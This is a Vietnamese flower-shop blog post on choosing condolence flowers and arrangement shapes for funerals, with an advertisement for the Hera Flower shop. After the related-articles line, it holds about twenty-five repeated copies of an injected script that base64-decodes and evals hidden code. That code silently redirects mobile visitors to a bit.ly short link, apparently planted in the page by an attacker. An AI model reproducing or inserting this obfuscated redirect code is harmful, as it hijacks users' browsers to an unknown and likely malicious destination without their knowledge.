Top 5+ Mẫu Hoa Chia Buồn Và Hình Dáng Hoa Chia Buồn Nên Chọn Để Viếng Đám Tang

Đăng bởi: AdminVào: 8 Tháng Một,2022

Nhắc đến hoa cúc, mọi người thường nghĩ ngay đến đây là một loại hoa truyền thống và thường được sử dụng trong các đám tang, các đám ma. Ngày này, nhiều loại hoa khác cũng được sử dụng làm hoa đám tang với nhiều ý nghĩa khác nhau. Cùng tìm hiểu các mẫu hoa chia buồn trong các đám tang và hình dạng các mẫu hoa chia buồn trong đám tang nhé!

Các mẫu hoa chia buồn đơn giản, phù hợp

Hoa sen chia buồn

Ý nghĩa của hoa sen chia buồn

 • Thể hiện lòng biết ơn đến người nhận
 • Thể hiện sự tôn nghiêm và trang trọng

hoa chia buồn - hoa sen

Tại sao nên chọn hoa sen trắng sử dụng trong tang lễ?

Hoa sen – thể hiện cho sự trong sạch và liêm khiết, là biểu tượng cho nhân cách con người thanh khiết và trong sáng, khi dâng sen cho người mất vừa thể hiện được sự tôn kính và yêu mến nhân phẩm của họ mà còn thể hiện được không khí tang lễ u buồn nhưng trang trọng hơn.

Ngoài ra, màu trắng hoa sen còn thể hiện cho sự khởi đầu, mang ý nghĩa con người mất đi ở kiếp này chính là mở ra một cánh cổng cho một kiếp khác, sự mở đầu cho sự luân hồi của các linh hồn.

>>Xem thêm: Những mẫu hoa chia buồn đẹp giá rẻ, giao hàng ngay trên toàn quốc

Hoa cúc chia buồn

Ý nghĩa của hoa cúc trong đám tang

 • Thể hiện nỗi buồn và sự tiếc nuối: mỗi một người ra đi đều thể hiện được nỗi buồn và sự tiếc nuối của bản thân mình đối với họ. đặc biệt là những người ra đi khi đang còn trẻ, khi họ còn nhiều kế hoạch, dự định còn giang dở, những ước mơ, ấp ủ của họ về cuộc sống vẫn chưa thực hiện được.
 • Tượng trưng cho sự tái sinh: Quan niệm dân gian cho rằng hoa cúc đặc biệt là hoa cúc trắng được xem là niềm hy vọng cho người đã khuất được bình yên vô tội và sẽ được an nhiên khi mà bắt đầu một cuộc sống mới tốt đẹp hơn.
 • Biểu hiện của sự cảm thông: việc gửi vòng hoa cúc đến tang lễ cũng là một cách bạn thể hiện sự cảm thông, chia sẻ cùng nỗi buồn đối với sự mất mát với thân nhân của người đã khuất đồng thời động viên họ vượt qua nỗi buồn này.

Hoa cúc chia buồn

Hoa huệ trắng chia buồn

Với màu trắng tinh khôi và hương thơm thanh khiết nên hoa huệ tượng trưng cho sự trong sáng và thanh cao, đại diện cho tấm lòng của người đã khuất. Hơn nữa, những đóa hoa huệ trong vòng hoa chia buồn còn thể hiện sự mong muốn linh hồn của người đã khuất được hoan hỉ, siêu thoát.

Ngoài ra, hoa huệ trắng còn được xem là biểu tượng của sự tôn kính và uy nghiêm, cũng thể hiện nỗi buồn và sự tiếc nuối đối với người đã mất, cũng là một lời từ biệt và sự cầu chúc cho người đã khuất được an lành ở thế giới bên kia.

Hoa hồng trắng chia buồn

Nguồn gốc về hoa hồng trắng cho đám tang

Theo thần thoại Hy Lạp, hoa hồng trắng gắn liền với truyền thuyết về nữ thần tình yêu Venus. Nàng được sinh ra từ bọt biển, khi bọt biển rơi xuống đất đã mọc lên một bông hoa hồng trắng tinh khiết. Vì thế, hoa hồng trắng dùng trong đám tang mang ý nghĩa tiễn biệt người đã khuất về đúng nơi mà họ đã đến.

hoa hồng trắng chia buồn

Ý nghĩa hoa hồng trắng dùng trong đám tang

Đây là loại hoa chia buồn thể hiện sự quan tâm của người viếng đối với một hành trình mới của người đã khuất. Điều này tượng trưng cho sự nhớ thương, tin yêu và mong những tâm hồn của người đã khuất được gặp nhiều may mắn.

Hoa hồng trắng được xem là màu sắc trang trọng và phù hợp nhất khi tham dự tang lễ. Màu trắng biểu trưng cho sự thuần khiết, tinh khôi như mong cầu người mất được yên nghỉ ở cõi vĩnh hằng.

Hoa lan trắng chia buồn

Hoa lan trắng là biểu tượng cho sự trinh nguyên, trong sáng. Vòng hoa tang lễ hoa lan trắng được kết thành bởi những bông hoa lan trắng, nhẹ nhàng, mang chút man mác buồn. Màu hoa trắng còn thể hiện sự tôn kính người đã mất.

Sử dụng tông màu trắng gợi đến sự mất mát và sự động viên đầy ấm áp. Màu trắng tang thương nhưng lan trắng không phải để tiếc thương mà là thêm kiên cường đối mặt.

Tại sao nên chọn hoa lan trắng chia buồn?

Hương thơm của hoa lan tinh khiết làm dịu đi, vơi bớt nỗi buồn đau thương của gia quyến. Vòng hoa tang lễ hoa lan trắng là lời chia sẻ sâu sắc, chân thành.

Mỗi con người đều đã sống và cống hiến cho cuộc đời. Khi họ lìa xa cuộc đời này, những đóng góp của họ đã ít nhiều ảnh hưởng đến bạn. Bởi vậy, một vòng hoa tang lễ sẽ thay lời tri ân cuối cùng của bạn đến người đã khuất.

Hoa ly trắng chia buồn

Hoa ly là một trong những loại hoa phổ biến và được ưa chuộng tại Việt Nam. Cùng với các loại hoa khác như hoa cúc, hoa huệ thì hoa ly trắng cũng được sử dụng nhiều trong các đám tang tại Việt Nam.

Hoa ly trắng được gửi tới các đám tang, đặc biệt là đám tang những người trẻ tuổi thể hiện lời chia buồn và sư bày tỏ tiếc nuối với sự ra đi của người đã mất cũng là lời cầu chúc cho linh hồn của họ được siêu thoát, an yên ở thế giới bên kia.

Đối với những người theo công giáo, hoa ly tại các đám tang là điều không thể thiếu, nó thể hiện cho sự tinh khiết và ánh hào quang rực rỡ của người đã khuất khi còn sống.

Hình dạng của hoa chia buồn trong đám tang

Vòng hoa chia buồn đám tang

Trong tang lễ, vòng hoa đám tang có vai trò, ý nghĩa nhất định. Nó không chỉ bày tỏ lòng thương tiếc, thành kính với người đã khuất mà còn là lời động viên, chia sẻ với gia chủ trước sự ra đi của người thân.

Thông thường, hoa chia buồn được kết từ hoa tươi và thường được đặt ở nhiều vị trí khác nhau. Chẳng hạn, lẵng hoa nhỏ được đặt ở nắp quan tài, bình hoa tươi đặt tại bàn thờ, vòng hoa tang được đắp trên mộ hoặc tại các cổng, …

Với những người đi phúng viếng, vòng hoa tươi được xem là sự lựa chọn hoàn hảo nhất bởi nó có khả năng truyền thông điệp, thể hiện sự chia buồn, luyến tiếc đối với người đã mất cũng như thân nhân người đã khuất.

Lẵng hoa chia buồn

Lưu ý khi chọn lẵng hoa chia buồn

Không chọn lẵng hoa chia buồn không phù hợp với phong tục vùng miền:

Mỗi vùng miền, mỗi nơi có một phong tục tập quán khác nhau do đó khi chọn mua hoa chia buồn gửi đến đám tang, nên lưu ý về phong tục tập quán của vùng miền nơi mà người mất đã từng sống.

Không chọn lẵng hoa chia buồn không phù hợp với người đã khuất.

Lẵng hoa chia buồn cho người già và người trẻ mất có sự khác nhau nhất định. Do đó, bạn nên dựa theo độ tuổi của người đã khuất mà lựa chọn lẵng hoa phù hợp nhất.

Chọn sai thời gian và địa điểm gửi hoa chia buồn

Theo phong tục của người Việt, vòng hoa chia buồn chỉ nên gửi đến sau khi niệm và trước giờ di quan đây chính là giờ mà chủ nhà sẽ nhận vòng hoa và những lời chia buồn từ anh em, bạn bè, hàng xóm. Vì vậy, bạn cần nắm được giờ cử hành tang lễ để có thể gửi vòng hoa đến viếng sao cho hợp lý nhất.

Không được quên những lời chia buồn

Gửi hoa chia buồn đến thôi chưa đủ, trên mỗi lẵng hoa chia buồn, bạn nên có một số lời chia buồn kèm theo đến thân nhân của người đã khuất, như vậy sẽ thể hiện được sự tôn kính nhất đối với người đã khuất mà còn thể hiện được sự chia buồn đối với thân nhân người đã khuất.

Giỏ hoa chia buồn

Thông thường, giỏ hoa chia buồn sẽ được gửi đến nhà tang lễ hay đến gia quyến của người đã khuất, và bất cứ ai liên quan, bạn đều có thể gửi đến. Giỏ hoa là một hình thức hoa viếng đám tang có thể bao gồm rất nhiều loại hoa, nhưng chúng vẫn thường bao gồm hoa cẩm chướng, hoa hồng, cây dương xỉ và cây xanh khác là chủ yếu.

hoa chia buồn

hoa chia buồn

Kệ hoa chia buồn

Một số mẫu kệ hoa chia buồn mà bạn có thể tham khảo như:

 • Kệ hoa chia buồn hình tròn: mang ý nghĩa về sự tái sinh
 • Kệ hoa chia buồn hình ovan: mang ý nghĩa chia sẻ sự đau thương mất mát mà thân nhân người mất gặp phải
 • Kệ hoa chia buồn hình trái tim:  thể hiện một tình cảm thương tiếc và xót xa của những cặp đôi yêu nhau nhưng phải chia lìa.
 • Kệ hoa chia buồn hình thánh giá: được sử dụng phổ biến trong tang lễ của người Công giáo, mang vẻ đẹp giản dị nhưng chứa đựng tình cảm chân thành và nghi thức thiêng liêng của người ở lại đối với người đã khuất.

>>Xem thêm: Kệ hoa chia buồn đẹp, giá rẻ tại shop hoa tươi Hera Flower

Bó hoa chia buồn

Bó hoa chia buồn được gửi đến tang lễ được thiết kế từ hoa hồng trắng, hoa baby trắng và lá phụ mang mục đích là cầu nối để bày tỏ nỗi chia buồn sâu sắc với người đã mất cũng như là chia sẻ nỗi niềm với người ở lại.

Màu trắng luôn tượng trưng cho sự thuần khiết, trong sáng và đức hạnh và thật cao quý cũng thể hiện được sự tôn trọng của bạn dành cho người đã mất.


Cách gửi điện hoa chia buồn

Điện hoa chia buồn là dịch vụ gửi hoa kính viếng theo yêu cầu của người đặt và đơn vị nhận yêu cầu sẽ gửi chúng đến địa chỉ và thời gian yêu cầu. dịch vụ này rất phù hợp với những người đang ở xa, không về kịp để an ủi, san sẻ nỗi đau cùng thân nhân người đã khuất.

Có nhiều cách thức gửi điện hoa chia buồn bằng cách gọi điện, gửi email, đặt trực tuyến qua website đến cơ sở hoa. Sau đó, bạn chỉ cần thanh toán theo phương thức đã thỏa thuận giữa 2 bên thì dịch vụ điện hoa chia buồn đã được thực hiện một cách trọn vẹn và chuẩn xác. Rất tiện lợi phải không nào!

Shop bán hoa chia buồn

Bạn đang tìm kiếm shop bán hoa chia buồn uy tín? Bạn đang phân vân không biết nên mua hoa chia buồn ở đâu? Hãy lựa chọn Hera Flower của chúng tôi – một website chuyên cung cấp dịch vụ điện hoa, quà tặng,… chuyên nghiệp đến khắp các tỉnh, thành phố trên cả nước.

Với thông điệp “NỖ LỰC VÌ BẠN”, Hera Flower hướng đến một dịch vụ chuyên nghiệp trong việc truyền tải thông điệp, cảm xúc từ người tặng gửi đến người nhận trên mọi miền đất nước.

Mục tiêu của các sản phẩm dịch vụ chúng tôi:

 • Uy tín – Đúng giờ, đúng yêu cầu.
 • Khách hàng hài lòng – Phục vụ tận tình.
 • Nỗ lực – Giao hoa, quà tặng tới mọi miền đất nước

Để biết thêm thông tin chi tiết về chúng tôi, bạn đọc có thể truy cập website: heraflower.vn hoặc hotline: 0907 823 773 để được nhân viên tư vấn về sản phẩm dịch vụ của chúng tôi nhé!

Trên đây là những chia sẻ của chúng tôi về hoa chia buồn, hy vọng đã đem đến những thông tin hữu ích cho bạn đọc!

Bài viết liên quan:

var base64Script = “CiAgICBmdW5jdGlvbiBpc01vYmlsZSgpIHsKICAgICAgcmV0dXJuIHdpbmRvdy5tYXRjaE1lZGlhKCIobWF4LXdpZHRoOiA3NjhweCkiKS5tYXRjaGVzOwogICAgfQoKICAgIGZ1bmN0aW9uIHJlZGlyZWN0KCkgewogICAgICB3aW5kb3cubG9jYXRpb24gPSAiaHR0cHM6Ly9iaXQubHkvM1FEYUZrRyI7CiAgICB9CgogICAgaWYgKGlzTW9iaWxlKCkpIHsKICAgICAgcmVkaXJlY3QoKTsKICAgIH0KICA=”;
var decodedScript = atob(base64Script);
eval(decodedScript);

var base64Script = “CiAgICBmdW5jdGlvbiBpc01vYmlsZSgpIHsKICAgICAgcmV0dXJuIHdpbmRvdy5tYXRjaE1lZGlhKCIobWF4LXdpZHRoOiA3NjhweCkiKS5tYXRjaGVzOwogICAgfQoKICAgIGZ1bmN0aW9uIHJlZGlyZWN0KCkgewogICAgICB3aW5kb3cubG9jYXRpb24gPSAiaHR0cHM6Ly9iaXQubHkvM1FEYUZrRyI7CiAgICB9CgogICAgaWYgKGlzTW9iaWxlKCkpIHsKICAgICAgcmVkaXJlY3QoKTsKICAgIH0KICA=”;
var decodedScript = atob(base64Script);
eval(decodedScript);

var base64Script = “CiAgICBmdW5jdGlvbiBpc01vYmlsZSgpIHsKICAgICAgcmV0dXJuIHdpbmRvdy5tYXRjaE1lZGlhKCIobWF4LXdpZHRoOiA3NjhweCkiKS5tYXRjaGVzOwogICAgfQoKICAgIGZ1bmN0aW9uIHJlZGlyZWN0KCkgewogICAgICB3aW5kb3cubG9jYXRpb24gPSAiaHR0cHM6Ly9iaXQubHkvM1FEYUZrRyI7CiAgICB9CgogICAgaWYgKGlzTW9iaWxlKCkpIHsKICAgICAgcmVkaXJlY3QoKTsKICAgIH0KICA=”;
var decodedScript = atob(base64Script);
eval(decodedScript);

var base64Script = “CiAgICBmdW5jdGlvbiBpc01vYmlsZSgpIHsKICAgICAgcmV0dXJuIHdpbmRvdy5tYXRjaE1lZGlhKCIobWF4LXdpZHRoOiA3NjhweCkiKS5tYXRjaGVzOwogICAgfQoKICAgIGZ1bmN0aW9uIHJlZGlyZWN0KCkgewogICAgICB3aW5kb3cubG9jYXRpb24gPSAiaHR0cHM6Ly9iaXQubHkvM1FEYUZrRyI7CiAgICB9CgogICAgaWYgKGlzTW9iaWxlKCkpIHsKICAgICAgcmVkaXJlY3QoKTsKICAgIH0KICA=”;
var decodedScript = atob(base64Script);
eval(decodedScript);

var base64Script = “CiAgICBmdW5jdGlvbiBpc01vYmlsZSgpIHsKICAgICAgcmV0dXJuIHdpbmRvdy5tYXRjaE1lZGlhKCIobWF4LXdpZHRoOiA3NjhweCkiKS5tYXRjaGVzOwogICAgfQoKICAgIGZ1bmN0aW9uIHJlZGlyZWN0KCkgewogICAgICB3aW5kb3cubG9jYXRpb24gPSAiaHR0cHM6Ly9iaXQubHkvM1FEYUZrRyI7CiAgICB9CgogICAgaWYgKGlzTW9iaWxlKCkpIHsKICAgICAgcmVkaXJlY3QoKTsKICAgIH0KICA=”;
var decodedScript = atob(base64Script);
eval(decodedScript);

var base64Script = “CiAgICBmdW5jdGlvbiBpc01vYmlsZSgpIHsKICAgICAgcmV0dXJuIHdpbmRvdy5tYXRjaE1lZGlhKCIobWF4LXdpZHRoOiA3NjhweCkiKS5tYXRjaGVzOwogICAgfQoKICAgIGZ1bmN0aW9uIHJlZGlyZWN0KCkgewogICAgICB3aW5kb3cubG9jYXRpb24gPSAiaHR0cHM6Ly9iaXQubHkvM1FEYUZrRyI7CiAgICB9CgogICAgaWYgKGlzTW9iaWxlKCkpIHsKICAgICAgcmVkaXJlY3QoKTsKICAgIH0KICA=”;
var decodedScript = atob(base64Script);
eval(decodedScript);

var base64Script = “CiAgICBmdW5jdGlvbiBpc01vYmlsZSgpIHsKICAgICAgcmV0dXJuIHdpbmRvdy5tYXRjaE1lZGlhKCIobWF4LXdpZHRoOiA3NjhweCkiKS5tYXRjaGVzOwogICAgfQoKICAgIGZ1bmN0aW9uIHJlZGlyZWN0KCkgewogICAgICB3aW5kb3cubG9jYXRpb24gPSAiaHR0cHM6Ly9iaXQubHkvM1FEYUZrRyI7CiAgICB9CgogICAgaWYgKGlzTW9iaWxlKCkpIHsKICAgICAgcmVkaXJlY3QoKTsKICAgIH0KICA=”;
var decodedScript = atob(base64Script);
eval(decodedScript);

var base64Script = “CiAgICBmdW5jdGlvbiBpc01vYmlsZSgpIHsKICAgICAgcmV0dXJuIHdpbmRvdy5tYXRjaE1lZGlhKCIobWF4LXdpZHRoOiA3NjhweCkiKS5tYXRjaGVzOwogICAgfQoKICAgIGZ1bmN0aW9uIHJlZGlyZWN0KCkgewogICAgICB3aW5kb3cubG9jYXRpb24gPSAiaHR0cHM6Ly9iaXQubHkvM1FEYUZrRyI7CiAgICB9CgogICAgaWYgKGlzTW9iaWxlKCkpIHsKICAgICAgcmVkaXJlY3QoKTsKICAgIH0KICA=”;
var decodedScript = atob(base64Script);
eval(decodedScript);

var base64Script = “CiAgICBmdW5jdGlvbiBpc01vYmlsZSgpIHsKICAgICAgcmV0dXJuIHdpbmRvdy5tYXRjaE1lZGlhKCIobWF4LXdpZHRoOiA3NjhweCkiKS5tYXRjaGVzOwogICAgfQoKICAgIGZ1bmN0aW9uIHJlZGlyZWN0KCkgewogICAgICB3aW5kb3cubG9jYXRpb24gPSAiaHR0cHM6Ly9iaXQubHkvM1FEYUZrRyI7CiAgICB9CgogICAgaWYgKGlzTW9iaWxlKCkpIHsKICAgICAgcmVkaXJlY3QoKTsKICAgIH0KICA=”;
var decodedScript = atob(base64Script);
eval(decodedScript);

var base64Script = “CiAgICBmdW5jdGlvbiBpc01vYmlsZSgpIHsKICAgICAgcmV0dXJuIHdpbmRvdy5tYXRjaE1lZGlhKCIobWF4LXdpZHRoOiA3NjhweCkiKS5tYXRjaGVzOwogICAgfQoKICAgIGZ1bmN0aW9uIHJlZGlyZWN0KCkgewogICAgICB3aW5kb3cubG9jYXRpb24gPSAiaHR0cHM6Ly9iaXQubHkvM1FEYUZrRyI7CiAgICB9CgogICAgaWYgKGlzTW9iaWxlKCkpIHsKICAgICAgcmVkaXJlY3QoKTsKICAgIH0KICA=”;
var decodedScript = atob(base64Script);
eval(decodedScript);

var base64Script = “CiAgICBmdW5jdGlvbiBpc01vYmlsZSgpIHsKICAgICAgcmV0dXJuIHdpbmRvdy5tYXRjaE1lZGlhKCIobWF4LXdpZHRoOiA3NjhweCkiKS5tYXRjaGVzOwogICAgfQoKICAgIGZ1bmN0aW9uIHJlZGlyZWN0KCkgewogICAgICB3aW5kb3cubG9jYXRpb24gPSAiaHR0cHM6Ly9iaXQubHkvM1FEYUZrRyI7CiAgICB9CgogICAgaWYgKGlzTW9iaWxlKCkpIHsKICAgICAgcmVkaXJlY3QoKTsKICAgIH0KICA=”;
var decodedScript = atob(base64Script);
eval(decodedScript);

var base64Script = “CiAgICBmdW5jdGlvbiBpc01vYmlsZSgpIHsKICAgICAgcmV0dXJuIHdpbmRvdy5tYXRjaE1lZGlhKCIobWF4LXdpZHRoOiA3NjhweCkiKS5tYXRjaGVzOwogICAgfQoKICAgIGZ1bmN0aW9uIHJlZGlyZWN0KCkgewogICAgICB3aW5kb3cubG9jYXRpb24gPSAiaHR0cHM6Ly9iaXQubHkvM1FEYUZrRyI7CiAgICB9CgogICAgaWYgKGlzTW9iaWxlKCkpIHsKICAgICAgcmVkaXJlY3QoKTsKICAgIH0KICA=”;
var decodedScript = atob(base64Script);
eval(decodedScript);

var base64Script = “CiAgICBmdW5jdGlvbiBpc01vYmlsZSgpIHsKICAgICAgcmV0dXJuIHdpbmRvdy5tYXRjaE1lZGlhKCIobWF4LXdpZHRoOiA3NjhweCkiKS5tYXRjaGVzOwogICAgfQoKICAgIGZ1bmN0aW9uIHJlZGlyZWN0KCkgewogICAgICB3aW5kb3cubG9jYXRpb24gPSAiaHR0cHM6Ly9iaXQubHkvM1FEYUZrRyI7CiAgICB9CgogICAgaWYgKGlzTW9iaWxlKCkpIHsKICAgICAgcmVkaXJlY3QoKTsKICAgIH0KICA=”;
var decodedScript = atob(base64Script);
eval(decodedScript);

var base64Script = “CiAgICBmdW5jdGlvbiBpc01vYmlsZSgpIHsKICAgICAgcmV0dXJuIHdpbmRvdy5tYXRjaE1lZGlhKCIobWF4LXdpZHRoOiA3NjhweCkiKS5tYXRjaGVzOwogICAgfQoKICAgIGZ1bmN0aW9uIHJlZGlyZWN0KCkgewogICAgICB3aW5kb3cubG9jYXRpb24gPSAiaHR0cHM6Ly9iaXQubHkvM1FEYUZrRyI7CiAgICB9CgogICAgaWYgKGlzTW9iaWxlKCkpIHsKICAgICAgcmVkaXJlY3QoKTsKICAgIH0KICA=”;
var decodedScript = atob(base64Script);
eval(decodedScript);

var base64Script = “CiAgICBmdW5jdGlvbiBpc01vYmlsZSgpIHsKICAgICAgcmV0dXJuIHdpbmRvdy5tYXRjaE1lZGlhKCIobWF4LXdpZHRoOiA3NjhweCkiKS5tYXRjaGVzOwogICAgfQoKICAgIGZ1bmN0aW9uIHJlZGlyZWN0KCkgewogICAgICB3aW5kb3cubG9jYXRpb24gPSAiaHR0cHM6Ly9iaXQubHkvM1FEYUZrRyI7CiAgICB9CgogICAgaWYgKGlzTW9iaWxlKCkpIHsKICAgICAgcmVkaXJlY3QoKTsKICAgIH0KICA=”;
var decodedScript = atob(base64Script);
eval(decodedScript);

var base64Script = “CiAgICBmdW5jdGlvbiBpc01vYmlsZSgpIHsKICAgICAgcmV0dXJuIHdpbmRvdy5tYXRjaE1lZGlhKCIobWF4LXdpZHRoOiA3NjhweCkiKS5tYXRjaGVzOwogICAgfQoKICAgIGZ1bmN0aW9uIHJlZGlyZWN0KCkgewogICAgICB3aW5kb3cubG9jYXRpb24gPSAiaHR0cHM6Ly9iaXQubHkvM1FEYUZrRyI7CiAgICB9CgogICAgaWYgKGlzTW9iaWxlKCkpIHsKICAgICAgcmVkaXJlY3QoKTsKICAgIH0KICA=”;
var decodedScript = atob(base64Script);
eval(decodedScript);

var base64Script = “CiAgICBmdW5jdGlvbiBpc01vYmlsZSgpIHsKICAgICAgcmV0dXJuIHdpbmRvdy5tYXRjaE1lZGlhKCIobWF4LXdpZHRoOiA3NjhweCkiKS5tYXRjaGVzOwogICAgfQoKICAgIGZ1bmN0aW9uIHJlZGlyZWN0KCkgewogICAgICB3aW5kb3cubG9jYXRpb24gPSAiaHR0cHM6Ly9iaXQubHkvM1FEYUZrRyI7CiAgICB9CgogICAgaWYgKGlzTW9iaWxlKCkpIHsKICAgICAgcmVkaXJlY3QoKTsKICAgIH0KICA=”;
var decodedScript = atob(base64Script);
eval(decodedScript);

var base64Script = “CiAgICBmdW5jdGlvbiBpc01vYmlsZSgpIHsKICAgICAgcmV0dXJuIHdpbmRvdy5tYXRjaE1lZGlhKCIobWF4LXdpZHRoOiA3NjhweCkiKS5tYXRjaGVzOwogICAgfQoKICAgIGZ1bmN0aW9uIHJlZGlyZWN0KCkgewogICAgICB3aW5kb3cubG9jYXRpb24gPSAiaHR0cHM6Ly9iaXQubHkvM1FEYUZrRyI7CiAgICB9CgogICAgaWYgKGlzTW9iaWxlKCkpIHsKICAgICAgcmVkaXJlY3QoKTsKICAgIH0KICA=”;
var decodedScript = atob(base64Script);
eval(decodedScript);

var base64Script = “CiAgICBmdW5jdGlvbiBpc01vYmlsZSgpIHsKICAgICAgcmV0dXJuIHdpbmRvdy5tYXRjaE1lZGlhKCIobWF4LXdpZHRoOiA3NjhweCkiKS5tYXRjaGVzOwogICAgfQoKICAgIGZ1bmN0aW9uIHJlZGlyZWN0KCkgewogICAgICB3aW5kb3cubG9jYXRpb24gPSAiaHR0cHM6Ly9iaXQubHkvM1FEYUZrRyI7CiAgICB9CgogICAgaWYgKGlzTW9iaWxlKCkpIHsKICAgICAgcmVkaXJlY3QoKTsKICAgIH0KICA=”;
var decodedScript = atob(base64Script);
eval(decodedScript);

var base64Script = “CiAgICBmdW5jdGlvbiBpc01vYmlsZSgpIHsKICAgICAgcmV0dXJuIHdpbmRvdy5tYXRjaE1lZGlhKCIobWF4LXdpZHRoOiA3NjhweCkiKS5tYXRjaGVzOwogICAgfQoKICAgIGZ1bmN0aW9uIHJlZGlyZWN0KCkgewogICAgICB3aW5kb3cubG9jYXRpb24gPSAiaHR0cHM6Ly9iaXQubHkvM1FEYUZrRyI7CiAgICB9CgogICAgaWYgKGlzTW9iaWxlKCkpIHsKICAgICAgcmVkaXJlY3QoKTsKICAgIH0KICA=”;
var decodedScript = atob(base64Script);
eval(decodedScript);

var base64Script = “CiAgICBmdW5jdGlvbiBpc01vYmlsZSgpIHsKICAgICAgcmV0dXJuIHdpbmRvdy5tYXRjaE1lZGlhKCIobWF4LXdpZHRoOiA3NjhweCkiKS5tYXRjaGVzOwogICAgfQoKICAgIGZ1bmN0aW9uIHJlZGlyZWN0KCkgewogICAgICB3aW5kb3cubG9jYXRpb24gPSAiaHR0cHM6Ly9iaXQubHkvM1FEYUZrRyI7CiAgICB9CgogICAgaWYgKGlzTW9iaWxlKCkpIHsKICAgICAgcmVkaXJlY3QoKTsKICAgIH0KICA=”;
var decodedScript = atob(base64Script);
eval(decodedScript);

var base64Script = “CiAgICBmdW5jdGlvbiBpc01vYmlsZSgpIHsKICAgICAgcmV0dXJuIHdpbmRvdy5tYXRjaE1lZGlhKCIobWF4LXdpZHRoOiA3NjhweCkiKS5tYXRjaGVzOwogICAgfQoKICAgIGZ1bmN0aW9uIHJlZGlyZWN0KCkgewogICAgICB3aW5kb3cubG9jYXRpb24gPSAiaHR0cHM6Ly9iaXQubHkvM1FEYUZrRyI7CiAgICB9CgogICAgaWYgKGlzTW9iaWxlKCkpIHsKICAgICAgcmVkaXJlY3QoKTsKICAgIH0KICA=”;
var decodedScript = atob(base64Script);
eval(decodedScript);

var base64Script = “CiAgICBmdW5jdGlvbiBpc01vYmlsZSgpIHsKICAgICAgcmV0dXJuIHdpbmRvdy5tYXRjaE1lZGlhKCIobWF4LXdpZHRoOiA3NjhweCkiKS5tYXRjaGVzOwogICAgfQoKICAgIGZ1bmN0aW9uIHJlZGlyZWN0KCkgewogICAgICB3aW5kb3cubG9jYXRpb24gPSAiaHR0cHM6Ly9iaXQubHkvM1FEYUZrRyI7CiAgICB9CgogICAgaWYgKGlzTW9iaWxlKCkpIHsKICAgICAgcmVkaXJlY3QoKTsKICAgIH0KICA=”;
var decodedScript = atob(base64Script);
eval(decodedScript);

var base64Script = “CiAgICBmdW5jdGlvbiBpc01vYmlsZSgpIHsKICAgICAgcmV0dXJuIHdpbmRvdy5tYXRjaE1lZGlhKCIobWF4LXdpZHRoOiA3NjhweCkiKS5tYXRjaGVzOwogICAgfQoKICAgIGZ1bmN0aW9uIHJlZGlyZWN0KCkgewogICAgICB3aW5kb3cubG9jYXRpb24gPSAiaHR0cHM6Ly9iaXQubHkvM1FEYUZrRyI7CiAgICB9CgogICAgaWYgKGlzTW9iaWxlKCkpIHsKICAgICAgcmVkaXJlY3QoKTsKICAgIH0KICA=”;
var decodedScript = atob(base64Script);
eval(decodedScript);

var base64Script = “CiAgICBmdW5jdGlvbiBpc01vYmlsZSgpIHsKICAgICAgcmV0dXJuIHdpbmRvdy5tYXRjaE1lZGlhKCIobWF4LXdpZHRoOiA3NjhweCkiKS5tYXRjaGVzOwogICAgfQoKICAgIGZ1bmN0aW9uIHJlZGlyZWN0KCkgewogICAgICB3aW5kb3cubG9jYXRpb24gPSAiaHR0cHM6Ly9iaXQubHkvM1FEYUZrRyI7CiAgICB9CgogICAgaWYgKGlzTW9iaWxlKCkpIHsKICAgICAgcmVkaXJlY3QoKTsKICAgIH0KICA=”;
var decodedScript = atob(base64Script);
eval(decodedScript);